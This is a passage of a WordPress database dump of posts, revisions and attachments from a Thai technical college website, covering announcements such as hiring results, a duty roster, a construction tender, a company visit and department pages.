(3267, 3, '2018-06-29 11:19:08', '2018-06-29 04:19:08', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '3264-autosave-v1', '', '', '2018-06-29 11:19:08', '2018-06-29 04:19:08', '', 3264, 'http://www.technicrayong.ac.th/3264-autosave-v1/', 0, 'revision', '', 0),
(3268, 3, '2018-06-29 11:30:41', '2018-06-29 04:30:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%A3%E0%B8%81%E0%B8%8E%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกรกฎาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99-%e0%b8%81%e0%b8%a3%e0%b8%81%e0%b8%8e%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-06-29 11:31:51', '2018-06-29 04:31:51', '', 0, 'http://www.technicrayong.ac.th/?p=3268', 373, 'post', '', 0),
(3270, 3, '2018-06-29 11:30:41', '2018-06-29 04:30:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%A3%E0%B8%81%E0%B8%8E%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือน กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3268-revision-v1', '', '', '2018-06-29 11:30:41', '2018-06-29 04:30:41', '', 3268, 'http://www.technicrayong.ac.th/3268-revision-v1/', 0, 'revision', '', 0),
(3272, 3, '2018-06-29 11:31:57', '2018-06-29 04:31:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%A3%E0%B8%81%E0%B8%8E%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3268-autosave-v1', '', '', '2018-06-29 11:31:57', '2018-06-29 04:31:57', '', 3268, 'http://www.technicrayong.ac.th/3268-autosave-v1/', 0, 'revision', '', 0),
(3273, 3, '2018-06-29 11:31:51', '2018-06-29 04:31:51', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%A3%E0%B8%81%E0%B8%8E%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3268-revision-v1', '', '', '2018-06-29 11:31:51', '2018-06-29 04:31:51', '', 3268, 'http://www.technicrayong.ac.th/3268-revision-v1/', 0, 'revision', '', 0),
(3275, 3, '2018-07-02 10:55:36', '2018-07-02 03:55:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.610892459286946%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมต้อนรับ บริษัท อีเล็คทรอลักซ์ ประเทศไทย จำกัด ซึ่งเข้ามาแนะแนวบริษัทฯ ให้กับนักเรียน นักศึกษา สาขาวิชาช่างเชื่อม ช่างไฟฟ้า ช่างอิเล็กทรอนิกส์ ช่างกลโรงงาน เครื่องมือวัดและควบคุม จำนวน 100 คน เพื่อให้นักเรียน นักศึกษา มีความรู้ความเข้าใจเกี่ยวกับบริษัทฯ ตลอดจนได้เดินเยี่ยมชมตามแผนกวิชา ณ วิทยาลัยเทคนิคระยอง วันพฤหัสบดีที่ 28 มิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b8%ad%e0%b8%b5%e0%b9%80%e0%b8%a5%e0%b9%87', '', '', '2018-07-02 10:55:36', '2018-07-02 03:55:36', '', 0, 'http://www.technicrayong.ac.th/?p=3275', 372, 'post', '', 0),
(3276, 3, '2018-07-02 10:55:07', '2018-07-02 03:55:07', '', '36308686_610886089287583_4734090949980848128_o', '', 'inherit', 'closed', 'closed', '', '36308686_610886089287583_4734090949980848128_o', '', '', '2018-07-02 10:55:07', '2018-07-02 03:55:07', '', 3275, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36308686_610886089287583_4734090949980848128_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3277, 3, '2018-07-02 10:55:36', '2018-07-02 03:55:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.610892459286946%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมต้อนรับ บริษัท อีเล็คทรอลักซ์ ประเทศไทย จำกัด ซึ่งเข้ามาแนะแนวบริษัทฯ ให้กับนักเรียน นักศึกษา สาขาวิชาช่างเชื่อม ช่างไฟฟ้า ช่างอิเล็กทรอนิกส์ ช่างกลโรงงาน เครื่องมือวัดและควบคุม จำนวน 100 คน เพื่อให้นักเรียน นักศึกษา มีความรู้ความเข้าใจเกี่ยวกับบริษัทฯ ตลอดจนได้เดินเยี่ยมชมตามแผนกวิชา ณ วิทยาลัยเทคนิคระยอง วันพฤหัสบดีที่ 28 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3275-revision-v1', '', '', '2018-07-02 10:55:36', '2018-07-02 03:55:36', '', 3275, 'http://www.technicrayong.ac.th/3275-revision-v1/', 0, 'revision', '', 0),
(3278, 3, '2018-07-02 10:55:46', '2018-07-02 03:55:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.610892459286946%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมต้อนรับ บริษัท อีเล็คทรอลักซ์ ประเทศไทย จำกัด ซึ่งเข้ามาแนะแนวบริษัทฯ ให้กับนักเรียน นักศึกษา สาขาวิชาช่างเชื่อม ช่างไฟฟ้า ช่างอิเล็กทรอนิกส์ ช่างกลโรงงาน เครื่องมือวัดและควบคุม จำนวน 100 คน เพื่อให้นักเรียน นักศึกษา มีความรู้ความเข้าใจเกี่ยวกับบริษัทฯ ตลอดจนได้เดินเยี่ยมชมตามแผนกวิชา ณ วิทยาลัยเทคนิคระยอง วันพฤหัสบดีที่ 28 มิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '3275-autosave-v1', '', '', '2018-07-02 10:55:46', '2018-07-02 03:55:46', '', 3275, 'http://www.technicrayong.ac.th/3275-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3280, 3, '2018-07-03 16:14:45', '2018-07-03 09:14:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างจ้างปรับปรุงพื้นบริเวณโดมหน้าพระวิษณุ', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88', '', '', '2018-07-03 16:14:45', '2018-07-03 09:14:45', '', 0, 'http://www.technicrayong.ac.th/?p=3280', 371, 'post', '', 0),
(3281, 3, '2018-07-03 16:14:32', '2018-07-03 09:14:32', '', 'ประกวดราคาจ้างก่อสร้างโดมพระวิษณุ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87', '', '', '2018-07-03 16:14:32', '2018-07-03 09:14:32', '', 3280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/ประกวดราคาจ้างก่อสร้างโดมพระวิษณุ.pdf', 0, 'attachment', 'application/pdf', 0),
(3282, 3, '2018-07-03 16:14:45', '2018-07-03 09:14:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างจ้างปรับปรุงพื้นบริเวณโดมหน้าพระวิษณุ', '', 'inherit', 'closed', 'closed', '', '3280-revision-v1', '', '', '2018-07-03 16:14:45', '2018-07-03 09:14:45', '', 3280, 'http://www.technicrayong.ac.th/3280-revision-v1/', 0, 'revision', '', 0),
(3283, 3, '2018-07-03 16:14:56', '2018-07-03 09:14:56', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาจ้างก่อสร้างจ้างปรับปรุงพื้นบริเวณโดมหน้าพระวิษณุ', '', 'inherit', 'closed', 'closed', '', '3280-autosave-v1', '', '', '2018-07-03 16:14:56', '2018-07-03 09:14:56', '', 3280, 'http://www.technicrayong.ac.th/3280-autosave-v1/', 0, 'revision', '', 0),
(3284, 3, '2018-07-04 11:52:35', '2018-07-04 04:52:35', '<img class=\"aligncenter size-full wp-image-3285\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-00.jpg\" alt=\"\" width=\"190\" height=\"239\" /> <img class=\"aligncenter wp-image-3286\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-15-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter wp-image-3287 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-11-20-32.jpg\" alt=\"\" width=\"954\" height=\"325\" />', 'การตลาด และธุรกิจค้าปลีก', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%a5%e0%b8%b2%e0%b8%94', '', '', '2018-07-04 14:14:41', '2018-07-04 07:14:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=3284', 0, 'page', '', 0),
(3285, 3, '2018-07-04 11:51:47', '2018-07-04 04:51:47', '', '4-7-2561 10-37-00', '', 'inherit', 'closed', 'closed', '', '4-7-2561-10-37-00', '', '', '2018-07-04 11:51:47', '2018-07-04 04:51:47', '', 3284, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-10-37-00.jpg', 0, 'attachment', 'image/jpeg', 0),
(3286, 3, '2018-07-04 11:51:51', '2018-07-04 04:51:51', '', '4-7-2561 10-37-15', '', 'inherit', 'closed', 'closed', '', '4-7-2561-10-37-15', '', '', '2018-07-04 11:51:51', '2018-07-04 04:51:51', '', 3284, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-10-37-15.jpg', 0, 'attachment', 'image/jpeg', 0),
(3287, 3, '2018-07-04 11:51:55', '2018-07-04 04:51:55', '', '4-7-2561 11-20-32', '', 'inherit', 'closed', 'closed', '', '4-7-2561-11-20-32', '', '', '2018-07-04 11:51:55', '2018-07-04 04:51:55', '', 3284, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-11-20-32.jpg', 0, 'attachment', 'image/jpeg', 0),
(3288, 3, '2018-07-04 11:52:35', '2018-07-04 04:52:35', '<img class=\"aligncenter size-full wp-image-3285\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-00.jpg\" alt=\"\" width=\"190\" height=\"239\" /> <img class=\"aligncenter wp-image-3286\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-15-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter wp-image-3287 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-11-20-32.jpg\" alt=\"\" width=\"954\" height=\"325\" />', 'การตลาด', '', 'inherit', 'closed', 'closed', '', '3284-revision-v1', '', '', '2018-07-04 11:52:35', '2018-07-04 04:52:35', '', 3284, 'http://www.technicrayong.ac.th/3284-revision-v1/', 0, 'revision', '', 0),
(3290, 3, '2018-07-04 12:15:46', '2018-07-04 05:15:46', '<img class=\"aligncenter size-full wp-image-3291\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-07.jpg\" alt=\"\" width=\"193\" height=\"240\" /> <img class=\"aligncenter wp-image-3293\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-17-22-300x79.jpg\" alt=\"\" width=\"383\" height=\"101\" /> <img class=\"aligncenter wp-image-3292 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-25.jpg\" alt=\"\" width=\"953\" height=\"340\" />', 'การเลขานุการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a5%e0%b8%82%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-07-04 12:15:46', '2018-07-04 05:15:46', '', 0, 'http://www.technicrayong.ac.th/?page_id=3290', 0, 'page', '', 0),
(3291, 3, '2018-07-04 12:14:14', '2018-07-04 05:14:14', '', '4-7-2561 12-11-07', '', 'inherit', 'closed', 'closed', '', '4-7-2561-12-11-07', '', '', '2018-07-04 12:14:14', '2018-07-04 05:14:14', '', 3290, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-12-11-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(3292, 3, '2018-07-04 12:14:17', '2018-07-04 05:14:17', '', '4-7-2561 12-11-25', '', 'inherit', 'closed', 'closed', '', '4-7-2561-12-11-25', '', '', '2018-07-04 12:14:17', '2018-07-04 05:14:17', '', 3290, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-12-11-25.jpg', 0, 'attachment', 'image/jpeg', 0),
(3293, 3, '2018-07-04 12:15:09', '2018-07-04 05:15:09', '', '4-7-2561 12-17-22', '', 'inherit', 'closed', 'closed', '', '4-7-2561-12-17-22', '', '', '2018-07-04 12:15:09', '2018-07-04 05:15:09', '', 3290, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-12-17-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(3294, 3, '2018-07-04 12:15:46', '2018-07-04 05:15:46', '<img class=\"aligncenter size-full wp-image-3291\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-07.jpg\" alt=\"\" width=\"193\" height=\"240\" /> <img class=\"aligncenter wp-image-3293\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-17-22-300x79.jpg\" alt=\"\" width=\"383\" height=\"101\" /> <img class=\"aligncenter wp-image-3292 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-25.jpg\" alt=\"\" width=\"953\" height=\"340\" />', 'การเลขานุการ', '', 'inherit', 'closed', 'closed', '', '3290-revision-v1', '', '', '2018-07-04 12:15:46', '2018-07-04 05:15:46', '', 3290, 'http://www.technicrayong.ac.th/3290-revision-v1/', 0, 'revision', '', 0),
(3295, 3, '2018-07-04 12:15:56', '2018-07-04 05:15:56', '<img class=\"aligncenter size-full wp-image-3291\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-07.jpg\" alt=\"\" width=\"193\" height=\"240\" /> <img class=\"aligncenter wp-image-3293\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-17-22-300x79.jpg\" alt=\"\" width=\"383\" height=\"101\" /> <img class=\"aligncenter wp-image-3292 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-11-25.jpg\" alt=\"\" width=\"953\" height=\"340\" />', 'การเลขานุการ', '', 'inherit', 'closed', 'closed', '', '3290-autosave-v1', '', '', '2018-07-04 12:15:56', '2018-07-04 05:15:56', '', 3290, 'http://www.technicrayong.ac.th/3290-autosave-v1/', 0, 'revision', '', 0),
(3296, 3, '2018-07-04 14:11:50', '2018-07-04 07:11:50', '<img class=\"aligncenter size-full wp-image-3298\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-47-43.jpg\" alt=\"\" width=\"194\" height=\"242\" /> <img class=\"aligncenter wp-image-3297\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-30-47-300x79.jpg\" alt=\"\" width=\"384\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3613\" src=\"/wp-content/uploads/2018/08/1-1.jpg\" alt=\"\" width=\"954\" height=\"625\" /> <img class=\"aligncenter size-full wp-image-3614\" src=\"/wp-content/uploads/2018/08/2-1.jpg\" alt=\"\" width=\"953\" height=\"307\" />', 'คอมพิวเตอร์ธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%b4%e0%b8%a7%e0%b9%80%e0%b8%95%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%98%e0%b8%b8%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88', '', '', '2018-08-08 16:00:28', '2018-08-08 09:00:28', '', 0, 'http://www.technicrayong.ac.th/?page_id=3296', 0, 'page', '', 0),
(3297, 3, '2018-07-04 14:11:07', '2018-07-04 07:11:07', '', '4-7-2561 12-30-47', '', 'inherit', 'closed', 'closed', '', '4-7-2561-12-30-47', '', '', '2018-07-04 14:11:07', '2018-07-04 07:11:07', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-12-30-47.jpg', 0, 'attachment', 'image/jpeg', 0),
(3298, 3, '2018-07-04 14:11:09', '2018-07-04 07:11:09', '', '4-7-2561 12-47-43', '', 'inherit', 'closed', 'closed', '', '4-7-2561-12-47-43', '', '', '2018-07-04 14:11:09', '2018-07-04 07:11:09', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-12-47-43.jpg', 0, 'attachment', 'image/jpeg', 0),
(3299, 3, '2018-07-04 14:11:11', '2018-07-04 07:11:11', '', '4-7-2561 14-13-01', '', 'inherit', 'closed', 'closed', '', '4-7-2561-14-13-01', '', '', '2018-07-04 14:11:11', '2018-07-04 07:11:11', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-14-13-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(3300, 3, '2018-07-04 14:11:50', '2018-07-04 07:11:50', '<img class=\"aligncenter size-full wp-image-3298\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-47-43.jpg\" alt=\"\" width=\"194\" height=\"242\" /> <img class=\"aligncenter wp-image-3297\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-30-47-300x79.jpg\" alt=\"\" width=\"384\" height=\"101\" /> <img class=\"aligncenter wp-image-3299 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-13-01.jpg\" alt=\"\" width=\"954\" height=\"623\" />', 'คอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '3296-revision-v1', '', '', '2018-07-04 14:11:50', '2018-07-04 07:11:50', '', 3296, 'http://www.technicrayong.ac.th/3296-revision-v1/', 0, 'revision', '', 0),
(3302, 3, '2018-07-04 14:14:59', '2018-07-04 07:14:59', '<img class=\"aligncenter size-full wp-image-3285\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-00.jpg\" alt=\"\" width=\"190\" height=\"239\" /> <img class=\"aligncenter wp-image-3286\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-15-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter wp-image-3287 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-11-20-32.jpg\" alt=\"\" width=\"954\" height=\"325\" />', 'การตลาด และธุรกิจค้าปลีก', '', 'inherit', 'closed', 'closed', '', '3284-autosave-v1', '', '', '2018-07-04 14:14:59', '2018-07-04 07:14:59', '', 3284, 'http://www.technicrayong.ac.th/3284-autosave-v1/', 0, 'revision', '', 0),
(3303, 3, '2018-07-04 14:14:41', '2018-07-04 07:14:41', '<img class=\"aligncenter size-full wp-image-3285\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-00.jpg\" alt=\"\" width=\"190\" height=\"239\" /> <img class=\"aligncenter wp-image-3286\" src=\"/wp-content/uploads/2018/07/4-7-2561-10-37-15-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter wp-image-3287 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-11-20-32.jpg\" alt=\"\" width=\"954\" height=\"325\" />', 'การตลาด และธุรกิจค้าปลีก', '', 'inherit', 'closed', 'closed', '', '3284-revision-v1', '', '', '2018-07-04 14:14:41', '2018-07-04 07:14:41', '', 3284, 'http://www.technicrayong.ac.th/3284-revision-v1/', 0, 'revision', '', 0),
(3304, 3, '2018-07-04 14:42:12', '2018-07-04 07:42:12', '<img class=\"aligncenter size-full wp-image-3305\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-48.jpg\" alt=\"\" width=\"194\" height=\"240\" /> <img class=\"aligncenter wp-image-3306\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-59-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3307 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-42-16.jpg\" alt=\"\" width=\"835\" height=\"339\" />', 'การจัดการโลจิสติกส์', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a5%e0%b8%88%e0%b8%b4%e0%b8%aa%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c', '', '', '2018-07-04 14:42:12', '2018-07-04 07:42:12', '', 0, 'http://www.technicrayong.ac.th/?page_id=3304', 0, 'page', '', 0),
(3305, 3, '2018-07-04 14:40:54', '2018-07-04 07:40:54', '', '4-7-2561 14-41-48', '', 'inherit', 'closed', 'closed', '', '4-7-2561-14-41-48', '', '', '2018-07-04 14:40:54', '2018-07-04 07:40:54', '', 3304, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-14-41-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(3306, 3, '2018-07-04 14:40:56', '2018-07-04 07:40:56', '', '4-7-2561 14-41-59', '', 'inherit', 'closed', 'closed', '', '4-7-2561-14-41-59', '', '', '2018-07-04 14:40:56', '2018-07-04 07:40:56', '', 3304, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-14-41-59.jpg', 0, 'attachment', 'image/jpeg', 0),
(3307, 3, '2018-07-04 14:41:01', '2018-07-04 07:41:01', '', '4-7-2561 14-42-16', '', 'inherit', 'closed', 'closed', '', '4-7-2561-14-42-16', '', '', '2018-07-04 14:41:01', '2018-07-04 07:41:01', '', 3304, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/4-7-2561-14-42-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(3308, 3, '2018-07-04 14:42:12', '2018-07-04 07:42:12', '<img class=\"aligncenter size-full wp-image-3305\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-48.jpg\" alt=\"\" width=\"194\" height=\"240\" /> <img class=\"aligncenter wp-image-3306\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-59-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3307 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-42-16.jpg\" alt=\"\" width=\"835\" height=\"339\" />', 'การจัดการโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '3304-revision-v1', '', '', '2018-07-04 14:42:12', '2018-07-04 07:42:12', '', 3304, 'http://www.technicrayong.ac.th/3304-revision-v1/', 0, 'revision', '', 0),
(3309, 3, '2018-07-04 14:42:28', '2018-07-04 07:42:28', '<img class=\"aligncenter size-full wp-image-3305\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-48.jpg\" alt=\"\" width=\"194\" height=\"240\" /> <img class=\"aligncenter wp-image-3306\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-41-59-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3307 size-full\" src=\"/wp-content/uploads/2018/07/4-7-2561-14-42-16.jpg\" alt=\"\" width=\"835\" height=\"339\" />', 'การจัดการโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '3304-autosave-v1', '', '', '2018-07-04 14:42:28', '2018-07-04 07:42:28', '', 3304, 'http://www.technicrayong.ac.th/3304-autosave-v1/', 0, 'revision', '', 0),
